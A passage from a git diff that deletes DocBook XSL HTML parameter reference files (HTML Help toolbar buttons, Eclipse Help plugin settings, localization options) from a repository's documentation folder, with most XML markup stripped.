parameter controls whether there should be folder-like -icons (1) or book-like icons (0) in ToC. If you want to use -folder-like icons you must swith off binary ToC using -htmlhelp.hhc.binary. - - - - - - -htmlhelp.hhc.binary - - - -htmlhelp.hhc.binary - - - - - -<xsl:param name="htmlhelp.hhc.binary" select="1"></xsl:param> - - - -Description - -This parametr controls whether binary TOC will be generated. You -must create binary TOC if you want to add Prev/Next buttons to toolbar -(which is default behaviour). Files with binary TOC can't be merged. - - - - - - -htmlhelp.hhc.width -integer - - -htmlhelp.hhc.width -Width of navigation (ToC) pane - - - - -<xsl:param name="htmlhelp.hhc.width"></xsl:param> - - - -Description - -This parameter specifies width of ToC pane in pixels. - - - - - - -htmlhelp.title -string - - -htmlhelp.title -Title of HTML Help - - - - -<xsl:param name="htmlhelp.title" select="''"></xsl:param> - - - -Description - -Content of this parameter will be used as a title for generated -HTML Help. If empty, title will be automatically taken from document. - - - - - - -htmlhelp.show.menu -boolean - - -htmlhelp.show.menu -Should be menu shown? - - - - -<xsl:param name="htmlhelp.show.menu" select="0"></xsl:param> - - - -Description - -If you want application menu in your HTML Help file, turn this -parameter to 1. - - - - - - -htmlhelp.show.toolbar.text -boolean - - -htmlhelp.show.toolbar.text -Show text under toolbar buttons? - - - - -<xsl:param name="htmlhelp.show.toolbar.text" select="1"></xsl:param> - - - -Description - -You can switch off display of texts under toolbar buttons by -setting this parameter to 0. - - - - - - -htmlhelp.show.advanced.search -boolean - - -htmlhelp.show.advanced.search -Should be advanced search available? - - - - -<xsl:param name="htmlhelp.show.advanced.search" select="0"></xsl:param> - - - -Description - -If you want advanced search features in your help, turn this -parameter to 1. - - - - - - -htmlhelp.show.favorities -boolean - - -htmlhelp.show.favorities -Should be favorities tab shown? - - - - -<xsl:param name="htmlhelp.show.favorities" select="0"></xsl:param> - - - -Description - -If you want favorities tab shown in your help, turn this -parameter to 1. - - - - - - -htmlhelp.button.hideshow -boolean - - -htmlhelp.button.hideshow -Should be Hide/Show button shown? - - - - -<xsl:param name="htmlhelp.button.hideshow" select="1"></xsl:param> - - - -Description - -If you want Hide/Show button shown on toolbar, turn this -parameter to 1. - - - - - - -htmlhelp.button.back -boolean - - -htmlhelp.button.back -Should be Back button shown? - - - - -<xsl:param name="htmlhelp.button.back" select="1"></xsl:param> - - - -Description - -If you want Back button shown on toolbar, turn this -parameter to 1. - - - - - - -htmlhelp.button.forward -boolean - - -htmlhelp.button.forward -Should be Forward button shown? - - - - -<xsl:param name="htmlhelp.button.forward" select="0"></xsl:param> - - - -Description - -If you want Forward button shown on toolbar, turn this -parameter to 1. - - - - - - -htmlhelp.button.stop -boolean - - -htmlhelp.button.stop -Should be Stop button shown? - - - - -<xsl:param name="htmlhelp.button.stop" select="0"></xsl:param> - - - -Description - -If you want Stop button shown on toolbar, turn this -parameter to 1. - - - - - - -htmlhelp.button.refresh -boolean - - -htmlhelp.button.refresh -Should be Refresh button shown? - - - - -<xsl:param name="htmlhelp.button.refresh" select="0"></xsl:param> - - - -Description - -If you want Refresh button shown on toolbar, turn this -parameter to 1. - - - - - - -htmlhelp.button.home -boolean - - -htmlhelp.button.home -Should be Home button shown? - - - - -<xsl:param name="htmlhelp.button.home" select="0"></xsl:param> - - - -Description - -If you want Home button shown on toolbar, turn this -parameter to 1. - - - - - - -htmlhelp.button.home.url -string - - -htmlhelp.button.home.url -URL address of page accessible by Home button - - - - -<xsl:param name="htmlhelp.button.home.url"></xsl:param> - - - -Description - -URL address of page accessible by Home button. - - - - - - -htmlhelp.button.options -boolean - - -htmlhelp.button.options -Should be Options button shown? - - - - -<xsl:param name="htmlhelp.button.options" select="1"></xsl:param> - - - -Description - -If you want Options button shown on toolbar, turn this -parameter to 1. - - - - - - -htmlhelp.button.print -boolean - - -htmlhelp.button.print -Should be Print button shown? - - - - -<xsl:param name="htmlhelp.button.print" select="1"></xsl:param> - - - -Description - -If you want Print button shown on toolbar, turn this -parameter to 1. - - - - - - -htmlhelp.button.locate -boolean - - -htmlhelp.button.locate -Should be Locate button shown? - - - - -<xsl:param name="htmlhelp.button.locate" select="0"></xsl:param> - - - -Description - -If you want Locate button shown on toolbar, turn this -parameter to 1. - - - - - - -htmlhelp.button.jump1 -boolean - - -htmlhelp.button.jump1 -Should be Jump1 button shown? - - - - -<xsl:param name="htmlhelp.button.jump1" select="0"></xsl:param> - - - -Description - -If you want Jump1 button shown on toolbar, turn this -parameter to 1. - - - - - - -htmlhelp.button.jump1.url -string - - -htmlhelp.button.jump1.url -URL address of page accessible by Jump1 button - - - - -<xsl:param name="htmlhelp.button.jump1.url"></xsl:param> - - - -Description - -URL address of page accessible by Jump1 button. - - - - - - -htmlhelp.button.jump1.title -string - - -htmlhelp.button.jump1.title -Title of Jump1 button - - - - -<xsl:param name="htmlhelp.button.jump1.title" select="'User1'"></xsl:param> - - - -Description - -Title of Jump1 button. - - - - - - -htmlhelp.button.jump2 -boolean - - -htmlhelp.button.jump2 -Should be Jump2 button shown? - - - - -<xsl:param name="htmlhelp.button.jump2" select="0"></xsl:param> - - - -Description - -If you want Jump2 button shown on toolbar, turn this -parameter to 1. - - - - - - -htmlhelp.button.jump2.url -string - - -htmlhelp.button.jump2.url -URL address of page accessible by Jump2 button - - - - -<xsl:param name="htmlhelp.button.jump2.url"></xsl:param> - - - -Description - -URL address of page accessible by Jump2 button. - - - - - - -htmlhelp.button.jump2.title -string - - -htmlhelp.button.jump2.title -Title of Jump2 button - - - - -<xsl:param name="htmlhelp.button.jump2.title" select="'User2'"></xsl:param> - - - -Description - -Title of Jump2 button. - - - - - - -htmlhelp.button.next -boolean - - -htmlhelp.button.next -Should be Next button shown? - - - - -<xsl:param name="htmlhelp.button.next" select="1"></xsl:param> - - - -Description - -If you want Next button shown on toolbar, turn this -parameter to 1. - - - - - - -htmlhelp.button.prev -boolean - - -htmlhelp.button.prev -Should be Prev button shown? - - - - -<xsl:param name="htmlhelp.button.prev" select="1"></xsl:param> - - - -Description - -If you want Prev button shown on toolbar, turn this -parameter to 1. - - - - - - -htmlhelp.button.zoom -boolean - - -htmlhelp.button.zoom -Should be Zoom button shown? - - - - -<xsl:param name="htmlhelp.button.zoom" select="0"></xsl:param> - - - -Description - -If you want Zoom button shown on toolbar, turn this -parameter to 1. - - - - - - -htmlhelp.remember.window.position -boolean - - -htmlhelp.remember.window.position -Remember help window position? - - - - -<xsl:param name="htmlhelp.remember.window.position" select="0"></xsl:param> - - - -Description - -To remember help window position between starts set this -parameter to 1. - - - - - - -htmlhelp.window.geometry -string - - -htmlhelp.window.geometry -Set initial geometry of help window - - - - -<xsl:param name="htmlhelp.window.geometry"></xsl:param> - - - -Description - -This parameter specifies initial position of help -window. E.g. - -<xsl:param name="htmlhelp.window.geometry">[160,64,992,704]</xsl:param> - - - - - - -htmlhelp.use.hhk -boolean - - -htmlhelp.use.hhk -Should be index built using HHK file? - - - - -<xsl:param name="htmlhelp.use.hhk" select="0"></xsl:param> - - - -Description - -If non-zero, index is created using HHK file. This provides some -new features. - - - - - - -htmlhelp.only -boolean - - -htmlhelp.only -Should be only project files generated? - - - - -<xsl:param name="htmlhelp.only" select="0"></xsl:param> - - - -Description - -If you want to play with various HTML Help parameters and you -don't need to regenerate all HTML files, you can set this parameter to -1. This setting will not process whole document, only project files -(hhp, hhc, hhk,...) will be generated. - - - - - - -Eclipse Help Platform - - -eclipse.autolabel -boolean - - -eclipse.autolabel -Should tree-like ToC use autonumbering feature? - - - - -<xsl:param name="eclipse.autolabel" select="0"></xsl:param> - - - -Description - -If you want to include chapter and section numbers into ToC in -the left panel, set this parameter to 1. - - - - - - -eclipse.plugin.name -string - - -eclipse.plugin.name -Eclipse Help plugin name - - - - -<xsl:param name="eclipse.plugin.name">DocBook Online Help Sample</xsl:param> - - - -Description - -Eclipse Help plugin name. - - - - - - -eclipse.plugin.id -string - - -eclipse.plugin.id -Eclipse Help plugin id - - - - -<xsl:param name="eclipse.plugin.id">com.example.help</xsl:param> - - - -Description - -Eclipse Help plugin id. You should change this id to something -unique for each help. - - - - - - -eclipse.plugin.provider -string - - -eclipse.plugin.provider -Eclipse Help plugin provider name - - - - -<xsl:param name="eclipse.plugin.provider">Example provider</xsl:param> - - - -Description - -Eclipse Help plugin provider name. - - - - - - -Localization - - -l10n.gentext.language -string - - -l10n.gentext.language -Sets the gentext language - - - - -<xsl:param name="l10n.gentext.language" select="''"></xsl:param> - - - -Description - -If this parameter is set to any value other than the empty string, its -value will be used as the value for the language when generating text. Setting -l10n.gentext.language overrides any settings within the -document being formatted. - -It's much more likely that you might want to set the -l10n.gentext.default.language parameter. - - - - - - -l10n.gentext.default.language -string - - -l10n.gentext.default.language -Sets the default language for generated text - - - - -<xsl:param name="l10n.gentext.default.language" select="'en'"></xsl:param> - - - -Description - -The value of the l10n.gentext.default.language -parameter is used as the language for generated text if no setting is provided -in the source document. - - - - - - -l10n.gentext.use.xref.language -boolean - - -l10n.gentext.use.xref.language -Use the language of target when generating cross-reference text? - - - - -<xsl:param name="l10n.gentext.use.xref.language" select="0"></xsl:param> - - - -Description - -If non-zero, the language of the target will be used when -generating cross reference text. Usually, the current -language is used when generating text (that is, the language of the -element that contains the cross-reference element). But setting this parameter -allows the language of the element pointed to to control -the generated text. - -Consider the following example: - - -<para lang="en">See also <xref linkend="chap3"/>.</para> - - - -Suppose that Chapter 3 happens to be written in German. -If l10n.gentext.use.xref.language is non-zero, the -resulting text will be something like this: - -
    -See also Kapital 3. -
    - -Where the more traditional rendering would be: - -
    -See also Chapter 3. -
    - -
    -
    - -
    - -The Stylesheet - -The param.xsl stylesheet is just a wrapper -around all these parameters. - - - -<!-- This file is generated from param.xweb; do not edit this file! --> - -<xsl:stylesheet exclude-result-prefixes="src" version="1.0"> - -<!-- ******************************************************************** - $Id: param.xml,v 1.1.1.1 2004/06/22 02:10:20 f8dy Exp $ - ******************************************************************** - - This file is part of the XSL DocBook Stylesheet distribution. - See ../README or http://nwalsh.com/docbook/xsl/ for copyright - and other information. - - ******************************************************************** --> - -<src:fragref linkend="admon.graphics.extension.frag"></src:fragref> -<src:fragref linkend="admon.graphics.frag"></src:fragref> -<src:fragref linkend="admon.graphics.path.frag"></src:fragref> -<src:fragref linkend="admon.style.frag"></src:fragref> -<src:fragref linkend="admon.textlabel.frag"></src:fragref> -<src:fragref linkend="annotate.toc.frag"></src:fragref> -<src:fragref linkend="appendix.autolabel.frag"></src:fragref> -<src:fragref linkend="author.othername.in.middle.frag"></src:fragref> -<src:fragref linkend="autotoc.label.separator.frag"></src:fragref> -<src:fragref linkend="base.dir.frag"></src:fragref> -<src:fragref linkend="biblioentry.item.separator.frag"></src:fragref> -<src:fragref linkend="bibliography.collection.frag"></src:fragref> -<src:fragref linkend="bibliography.numbered.frag"></src:fragref> -<src:fragref linkend="bridgehead.in.toc.frag"></src:fragref> -<src:fragref linkend="callout.defaultcolumn.frag"></src:fragref> -<src:fragref linkend="callout.graphics.extension.frag"></src:fragref> -<src:fragref linkend="callout.graphics.frag"></src:fragref> -<src:fragref linkend="callout.graphics.number.limit.frag"></src:fragref> -<src:fragref linkend="callout.graphics.path.frag"></src:fragref> -<src:fragref linkend="callout.list.table.frag"></src:fragref> -<src:fragref linkend="callout.unicode.frag"></src:fragref> -<src:fragref linkend="callout.unicode.number.limit.frag"></src:fragref> -<src:fragref linkend="callout.unicode.start.character.frag"></src:fragref> -<src:fragref linkend="callouts.extension.frag"></src:fragref> -<src:fragref linkend="chapter.autolabel.frag"></src:fragref> -<src:fragref linkend="chunk.first.sections.frag"></src:fragref> -<src:fragref linkend="chunk.quietly.frag"></src:fragref> -<src:fragref linkend="chunk.section.depth.frag"></src:fragref> -<src:fragref linkend="chunk.toc.frag"></src:fragref> -<src:fragref linkend="chunk.tocs.and.lots.frag"></src:fragref> -<src:fragref linkend="citerefentry.link.frag"></src:fragref> -<src:fragref linkend="collect.xref.targets.frag"></src:fragref> -<src:fragref linkend="css.decoration.frag"></src:fragref> -<src:fragref linkend="current.docid.frag"></src:fragref> -<src:fragref linkend="default.float.class.frag"></src:fragref> -<src:fragref linkend="default.image.width.frag"></src:fragref> -<src:fragref linkend="default.table.width.frag"></src:fragref> -<src:fragref linkend="draft.mode.frag"></src:fragref> -<src:fragref linkend="draft.watermark.image.frag"></src:fragref> -<src:fragref linkend="ebnf.table.bgcolor.frag"></src:fragref> -<src:fragref linkend="ebnf.table.border.frag"></src:fragref> -<src:fragref linkend="ebnf.assignment.frag"></src:fragref> -<src:fragref linkend="ebnf.statement.terminator.frag"></src:fragref> -<src:fragref linkend="eclipse.autolabel.frag"></src:fragref> -<src:fragref linkend="eclipse.plugin.name.frag"></src:fragref> -<src:fragref linkend="eclipse.plugin.id.frag"></src:fragref> -<src:fragref linkend="eclipse.plugin.provider.frag"></src:fragref> -<src:fragref linkend="emphasis.propagates.style.frag"></src:fragref> -<src:fragref linkend="entry.propagates.style.frag"></src:fragref> -<src:fragref linkend="firstterm.only.link.frag"></src:fragref> -<src:fragref linkend="footer.rule.frag"></src:fragref> -<src:fragref linkend="footnote.number.format.frag"></src:fragref> -<src:fragref linkend="footnote.number.symbols.frag"></src:fragref> -<src:fragref linkend="formal.procedures.frag"></src:fragref> -<src:fragref linkend="formal.title.placement.frag"></src:fragref> -<src:fragref linkend="funcsynopsis.decoration.frag"></src:fragref> -<src:fragref linkend="funcsynopsis.style.frag"></src:fragref> -<src:fragref linkend="funcsynopsis.tabular.threshold.frag"></src:fragref> -<src:fragref linkend="function.parens.frag"></src:fragref> -<src:fragref linkend="generate.id.attributes.frag"></src:fragref> -<src:fragref linkend="generate.index.frag"></src:fragref> -<src:fragref linkend="generate.legalnotice.link.frag"></src:fragref> -<src:fragref linkend="generate.manifest.frag"></src:fragref> -<src:fragref linkend="generate.meta.abstract.frag"></src:fragref> -<src:fragref linkend="generate.section.toc.level.frag"></src:fragref> -<src:fragref linkend="generate.toc.frag"></src:fragref> -<src:fragref linkend="glossary.collection.frag"></src:fragref> -<src:fragref linkend="glossentry.show.acronym.frag"></src:fragref> -<src:fragref linkend="glossterm.auto.link.frag"></src:fragref> -<src:fragref linkend="graphic.default.extension.frag"></src:fragref> -<src:fragref linkend="graphicsize.extension.frag"></src:fragref> -<src:fragref linkend="header.rule.frag"></src:fragref> -<src:fragref linkend="html.base.frag"></src:fragref> -<src:fragref linkend="html.cellpadding.frag"></src:fragref> -<src:fragref linkend="html.cellspacing.frag"></src:fragref> -<src:fragref linkend="html.cleanup.frag"></src:fragref> -<src:fragref linkend="html.ext.frag"></src:fragref> -<src:fragref linkend="html.extra.head.links.frag"></src:fragref> -<src:fragref linkend="html.longdesc.frag"></src:fragref> -<src:fragref linkend="html.longdesc.link.frag"></src:fragref> -<src:fragref linkend="html.stylesheet.frag"></src:fragref> -<src:fragref linkend="html.stylesheet.type.frag"></src:fragref> -<src:fragref linkend="htmlhelp.alias.file.frag"></src:fragref> -<src:fragref linkend="htmlhelp.autolabel.frag"></src:fragref> -<src:fragref linkend="htmlhelp.button.back.frag"></src:fragref> -<src:fragref linkend="htmlhelp.button.forward.frag"></src:fragref> -<src:fragref linkend="htmlhelp.button.hideshow.frag"></src:fragref> -<src:fragref linkend="htmlhelp.button.home.frag"></src:fragref> -<src:fragref linkend="htmlhelp.button.home.url.frag"></src:fragref> -<src:fragref linkend="htmlhelp.button.jump1.frag"></src:fragref> -<src:fragref linkend="htmlhelp.button.jump1.title.frag"></src:fragref> -<src:fragref linkend="htmlhelp.button.jump1.url.frag"></src:fragref> -<src:fragref linkend="htmlhelp.button.jump2.frag"></src:fragref> -<src:fragref linkend="htmlhelp.button.jump2.title.frag"></src:fragref> -<src:fragref linkend="htmlhelp.button.jump2.url.frag"></src:fragref> -<src:fragref linkend="htmlhelp.button.locate.frag"></src:fragref> -<src:fragref linkend="htmlhelp.button.next.frag"></src:fragref> -<src:fragref linkend="htmlhelp.button.options.frag"></src:fragref> -<src:fragref linkend="htmlhelp.button.prev.frag"></src:fragref> -<src:fragref linkend="htmlhelp.button.print.frag"></src:fragref> -<src:fragref linkend="htmlhelp.button.refresh.frag"></src:fragref> -<src:fragref linkend="htmlhelp.button.stop.frag"></src:fragref> -<src:fragref linkend="htmlhelp.button.zoom.frag"></src:fragref> -<src:fragref linkend="htmlhelp.chm.frag"></src:fragref> -<src:fragref linkend="htmlhelp.default.topic.frag"></src:fragref> -<src:fragref linkend="htmlhelp.display.progress.frag"></src:fragref> -<src:fragref linkend="htmlhelp.encoding.frag"></src:fragref> -<src:fragref linkend="htmlhelp.enhanced.decompilation.frag"></src:fragref> -<src:fragref linkend="htmlhelp.enumerate.images.frag"></src:fragref> -<src:fragref linkend="htmlhelp.force.map.and.alias.frag"></src:fragref> -<src:fragref linkend="htmlhelp.hhc.binary.frag"></src:fragref> -<src:fragref linkend="htmlhelp.hhc.folders.instead.books.frag"></src:fragref> -<src:fragref linkend="htmlhelp.hhc.frag"></src:fragref> -<src:fragref linkend="htmlhelp.hhc.section.depth.frag"></src:fragref> -<src:fragref linkend="htmlhelp.hhc.show.root.frag"></src:fragref> -<src:fragref linkend="htmlhelp.hhc.width.frag"></src:fragref> -<src:fragref linkend="htmlhelp.hhk.frag"></src:fragref> -<src:fragref linkend="htmlhelp.hhp.frag"></src:fragref> -<src:fragref linkend="htmlhelp.hhp.tail.frag"></src:fragref> -<src:fragref linkend="htmlhelp.hhp.window.frag"></src:fragref> -<src:fragref linkend="htmlhelp.hhp.windows.frag"></src:fragref> -<src:fragref linkend="htmlhelp.map.file.frag"></src:fragref> -<src:fragref linkend="htmlhelp.only.frag"></src:fragref> -<src:fragref linkend="htmlhelp.remember.window.position.frag"></src:fragref> -<src:fragref linkend="htmlhelp.show.advanced.search.frag"></src:fragref> -<src:fragref linkend="htmlhelp.show.favorities.frag"></src:fragref> -<src:fragref linkend="htmlhelp.show.menu.frag"></src:fragref> -<src:fragref linkend="htmlhelp.show.toolbar.text.frag"></src:fragref> -<src:fragref linkend="htmlhelp.title.frag"></src:fragref> -<src:fragref linkend="htmlhelp.use.hhk.frag"></src:fragref> -<src:fragref linkend="htmlhelp.window.geometry.frag"></src:fragref> -<src:fragref linkend="ignore.image.scaling.frag"></src:fragref> -<src:fragref linkend="inherit.keywords.frag"></src:fragref> -<src:fragref linkend="l10n.gentext.default.language.frag"></src:fragref> -<src:fragref linkend="l10n.gentext.language.frag"></src:fragref> -<src:fragref linkend="l10n.gentext.use.xref.language.frag"></src:fragref> -<src:fragref linkend="label.from.part.frag"></src:fragref> -<src:fragref linkend="linenumbering.everyNth.frag"></src:fragref> -<src:fragref linkend="linenumbering.extension.frag"></src:fragref> -<src:fragref linkend="linenumbering.separator.frag"></src:fragref> -<src:fragref linkend="linenumbering.width.frag"></src:fragref> -<src:fragref linkend="link.mailto.url.frag"></src:fragref> -<src:fragref linkend="make.graphic.viewport.frag"></src:fragref> -<src:fragref linkend="make.single.year.ranges.frag"></src:fragref> -<src:fragref linkend="make.valid.html.frag"></src:fragref> -<src:fragref linkend="make.year.ranges.frag"></src:fragref> -<src:fragref linkend="manifest.frag"></src:fragref> -<src:fragref linkend="manifest.in.base.dir.frag"></src:fragref> -<src:fragref linkend="manual.toc.frag"></src:fragref> -<src:fragref linkend="menuchoice.menu.separator.frag"></src:fragref> -<src:fragref linkend="menuchoice.separator.frag"></src:fragref> -<src:fragref linkend="navig.graphics.extension.frag"></src:fragref> -<src:fragref linkend="navig.graphics.frag"></src:fragref> -<src:fragref linkend="navig.graphics.path.frag"></src:fragref> -<src:fragref linkend="navig.showtitles.frag"></src:fragref> -<src:fragref linkend="nominal.image.depth.frag"></src:fragref> -<src:fragref linkend="nominal.image.width.frag"></src:fragref> -<src:fragref linkend="nominal.table.width.frag"></src:fragref> -<src:fragref linkend="olink.base.uri.frag"></src:fragref> -<src:fragref linkend="olink.doctitle.frag"></src:fragref> -<src:fragref linkend="olink.fragid.frag"></src:fragref> -<src:fragref linkend="olink.outline.ext.frag"></src:fragref> -<src:fragref linkend="olink.pubid.frag"></src:fragref> -<src:fragref linkend="olink.resolver.frag"></src:fragref> -<src:fragref linkend="olink.sysid.frag"></src:fragref> -<src:fragref linkend="para.propagates.style.frag"></src:fragref> -<src:fragref linkend="part.autolabel.frag"></src:fragref> -<src:fragref linkend="phrase.propagates.style.frag"></src:fragref> -<src:fragref linkend="pixels.per.inch.frag"></src:fragref> -<src:fragref linkend="points.per.em.frag"></src:fragref> -<src:fragref linkend="preface.autolabel.frag"></src:fragref> -<src:fragref linkend="preferred.mediaobject.role.frag"></src:fragref> -<src:fragref linkend="process.empty.source.toc.frag"></src:fragref> -<src:fragref linkend="process.source.toc.frag"></src:fragref> -<src:fragref linkend="profile.arch.frag"></src:fragref> -<src:fragref linkend="profile.attribute.frag"></src:fragref> -<src:fragref linkend="profile.condition.frag"></src:fragref> -<src:fragref linkend="profile.conformance.frag"></src:fragref> -<src:fragref linkend="profile.lang.frag"></src:fragref> -<src:fragref linkend="profile.os.frag"></src:fragref> -<src:fragref linkend="profile.revision.frag"></src:fragref> -<src:fragref linkend="profile.revisionflag.frag"></src:fragref> -<src:fragref linkend="profile.role.frag"></src:fragref> -<src:fragref linkend="profile.security.frag"></src:fragref> -<src:fragref linkend="profile.separator.frag"></src:fragref> -<src:fragref linkend="profile.userlevel.frag"></src:fragref> -<src:fragref linkend="profile.value.frag"></src:fragref> -<src:fragref linkend="profile.vendor.frag"></src:fragref> -<src:fragref linkend="punct.honorific.frag"></src:fragref> -<src:fragref linkend="qanda.defaultlabel.frag"></src:fragref> -<src:fragref linkend="qanda.inherit.numeration.frag"></src:fragref> -<src:fragref linkend="qandadiv.autolabel.frag"></src:fragref> -<src:fragref linkend="refentry.generate.name.frag"></src:fragref> -<src:fragref linkend="refentry.generate.title.frag"></src:fragref> -<src:fragref linkend="refentry.separator.frag"></src:fragref> -<src:fragref linkend="refentry.xref.manvolnum.frag"></src:fragref> -<src:fragref linkend="root.filename.frag"></src:fragref> -<src:fragref linkend="rootid.frag"></src:fragref> -<src:fragref linkend="runinhead.default.title.end.punct.frag"></src:fragref> -<src:fragref linkend="runinhead.title.end.punct.frag"></src:fragref> -<src:fragref linkend="section.autolabel.frag"></src:fragref> -<src:fragref linkend="section.label.includes.component.label.frag"></src:fragref> -<src:fragref linkend="segmentedlist.as.table.frag"></src:fragref> -<src:fragref linkend="shade.verbatim.frag"></src:fragref> -<src:fragref linkend="shade.verbatim.style.frag"></src:fragref> -<src:fragref linkend="show.comments.frag"></src:fragref> -<src:fragref linkend="show.revisionflag.frag"></src:fragref> -<src:fragref linkend="spacing.paras.frag"></src:fragref> -<src:fragref linkend="suppress.footer.navigation.frag"></src:fragref> -<src:fragref linkend="suppress.header.navigation.frag"></src:fragref> -<src:fragref linkend="suppress.navigation.frag"></src:fragref> -<src:fragref linkend="table.borders.with.css.frag"></src:fragref> -<src:fragref linkend="table.cell.border.color.frag"></src:fragref> -<src:fragref linkend="table.cell.border.style.frag"></src:fragref> -<src:fragref linkend="table.cell.border.thickness.frag"></src:fragref> -<src:fragref linkend="table.footnote.number.format.frag"></src:fragref> -<src:fragref linkend="table.footnote.number.symbols.frag"></src:fragref> -<src:fragref linkend="table.frame.border.color.frag"></src:fragref> -<src:fragref linkend="table.frame.border.style.frag"></src:fragref> -<src:fragref linkend="table.frame.border.thickness.frag"></src:fragref> -<src:fragref linkend="tablecolumns.extension.frag"></src:fragref> -<src:fragref linkend="target.database.document.frag"></src:fragref> -<src:fragref linkend="targets.filename.frag"></src:fragref> -<src:fragref linkend="tex.math.delims.frag"></src:fragref> -<src:fragref linkend="tex.math.file.frag"></src:fragref> -<src:fragref linkend="tex.math.in.alt.frag"></src:fragref> -<src:fragref linkend="textinsert.extension.frag"></src:fragref> -<src:fragref linkend="toc.list.type.frag"></src:fragref> -<src:fragref linkend="toc.section.depth.frag"></src:fragref> -<src:fragref linkend="toc.max.depth.frag"></src:fragref> -<src:fragref linkend="ulink.target.frag"></src:fragref> -<src:fragref linkend="use.embed.for.svg.frag"></src:fragref> -<src:fragref linkend="use.extensions.frag"></src:fragref> -<src:fragref linkend="use.id.as.filename.frag"></src:fragref> -<src:fragref linkend="use.local.olink.style.frag"></src:fragref> -<src:fragref linkend="use.role.as.xrefstyle.frag"></src:fragref> -<src:fragref linkend="use.role.for.mediaobject.frag"></src:fragref> -<src:fragref linkend="use.svg.frag"></src:fragref> -<src:fragref linkend="variablelist.as.table.frag"></src:fragref> -<src:fragref linkend="xref.with.number.and.title.frag"></src:fragref> -<src:fragref linkend="xref.label-title.separator.frag"></src:fragref> -<src:fragref linkend="xref.label-page.separator.frag"></src:fragref> -<src:fragref linkend="xref.title-page.separator.frag"></src:fragref> -<src:fragref linkend="insert.xref.page.number.frag"></src:fragref> - -</xsl:stylesheet> - - - - -
    \ No newline at end of file diff --git a/chardet/docs/docbook/xsl/html/param.xsl b/chardet/docs/docbook/xsl/html/param.xsl deleted file mode 100644 index 48a5eb2..0000000 --- a/chardet/docs/docbook/xsl/html/param.xsl +++ /dev/null @@ -1,299 +0,0 @@ - - - - - - - - - -images/ - - margin-left: 0.5in; margin-right: 0.5in; - - - - - - - -. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -::= - - - - - -DocBook Online Help Sample -com.example.help -Example provider - - - - - - - - -figure before -example before -equation before -table before -procedure before -task before - - -kr - -0 - - - - - - - -appendix toc,title -article/appendix nop -article toc,title -book toc,title,figure,table,example,equation -chapter toc,title -part toc,title -preface toc,title -qandadiv toc -qandaset toc -reference toc,title -sect1 toc -sect2 toc -sect3 toc -sect4 toc -sect5 toc -section toc -set toc,title - - - - - - - - - - - - - - - - - -text/css - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -images/ -1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -number - - - - - - - - - - - - - - - - 0 - #E0E0E0 - - -1 -0 - -0 -0 -0 - - - - - - - - - - - - - - - - - - -dl -2 -8 - - - - - - - - - - -: - - -no - - \ No newline at end of file diff --git a/chardet/docs/docbook/xsl/html/param.xweb b/chardet/docs/docbook/xsl/html/param.xweb deleted file mode 100644 index e6e3a2f..0000000 --- a/chardet/docs/docbook/xsl/html/param.xweb +++ /dev/null @@ -1,667 +0,0 @@ - -%param.ent; -]> - - -HTML Parameter Reference - -$Id: param.xweb,v 1.1.1.1 2004/06/22 02:10:21 f8dy Exp $ - - - Walsh - Norman - - - 1999 - 2000 - 2001 - Norman Walsh - - - -Introduction - -This is technical reference documentation for the DocBook XSL -Stylesheets; it documents (some of) the parameters, templates, and -other elements of the stylesheets. - -This reference describes each of the HTML Stylesheet parameters. -These are the easily customizable parts of the stylesheet. -If you want to specify an alternate value for one or more of these -parameters, you can do so in a driver stylesheet. - -For example, if you want to change the html.stylesheet -to reference.css, you might create a driver -stylesheet like this: - - - - - - reference.css - -]]> - -Naturally, you have to change the -href attribute on -<xsl:import> to point to -docbook.xsl on your system. (Or -chunk.xsl, if you're using chunking.) - -This is not intended to be user documentation. -It is provided for developers writing customization layers for the -stylesheets, and for anyone who's interested in how it -works. - -Although I am trying to be thorough, this documentation is known -to be incomplete. Don't forget to read the source, too :-) - - -Admonitions -&admon.graphics.extension; -&admon.graphics.path; -&admon.graphics; -&admon.textlabel; -&admon.style; - - -Callouts -&callout.defaultcolumn; -&callout.graphics.extension; -&callout.graphics.number.limit; -&callout.graphics.path; -&callout.graphics; -&callout.list.table; -&callout.unicode.number.limit; -&callout.unicode.start.character; -&callout.unicode; -&callouts.extension; - - -EBNF -&ebnf.table.bgcolor; -&ebnf.table.border; -&ebnf.assignment; -&ebnf.statement.terminator; - - -ToC/LoT/Index Generation -&annotate.toc; -&autotoc.label.separator; -&process.source.toc; -&process.empty.source.toc; -&bridgehead.in.toc; -&manual.toc; -&toc.list.type; -&toc.section.depth; -&toc.max.depth; -&generate.toc; -&generate.section.toc.level; -&generate.index; - - -Extensions -&linenumbering.everyNth; -&linenumbering.extension; -&linenumbering.separator; -&linenumbering.width; -&tablecolumns.extension; -&textinsert.extension; -&graphicsize.extension; -&use.extensions; - - -Automatic labelling -&chapter.autolabel; -&appendix.autolabel; -&part.autolabel; -&preface.autolabel; -&qandadiv.autolabel; -§ion.autolabel; -§ion.label.includes.component.label; -&label.from.part; - - - - -HTML -&html.base; -&html.stylesheet.type; -&html.stylesheet; -&use.id.as.filename; -&css.decoration; -&spacing.paras; -&emphasis.propagates.style; -¶.propagates.style; -&phrase.propagates.style; -&entry.propagates.style; -&html.longdesc; -&html.longdesc.link; -&make.valid.html; -&html.cleanup; -&draft.mode; -&draft.watermark.image; -&generate.id.attributes; -&generate.meta.abstract; - - -XSLT Processing -&rootid; -&suppress.navigation; -&suppress.header.navigation; -&suppress.footer.navigation; -&header.rule; -&footer.rule; - - -Meta/*Info -&inherit.keywords; -&make.single.year.ranges; -&make.year.ranges; -&author.othername.in.middle; -&generate.legalnotice.link; - - -Reference Pages -&funcsynopsis.decoration; -&funcsynopsis.style; -&funcsynopsis.tabular.threshold; -&function.parens; -&refentry.generate.name; -&refentry.generate.title; -&refentry.xref.manvolnum; -&citerefentry.link; -&refentry.separator; - - -Tables -&default.table.width; -&nominal.table.width; -&table.borders.with.css; -&table.cell.border.style; -&table.cell.border.thickness; -&table.cell.border.color; -&table.frame.border.style; -&table.frame.border.thickness; -&table.frame.border.color; -&html.cellspacing; -&html.cellpadding; - - -QAndASet -&qanda.defaultlabel; -&qanda.inherit.numeration; - - -Linking -&target.database.document; -&targets.filename; -&collect.xref.targets; -&olink.base.uri; -&use.local.olink.style; -¤t.docid; -&olink.doctitle; -&link.mailto.url; -&ulink.target; -&olink.fragid; 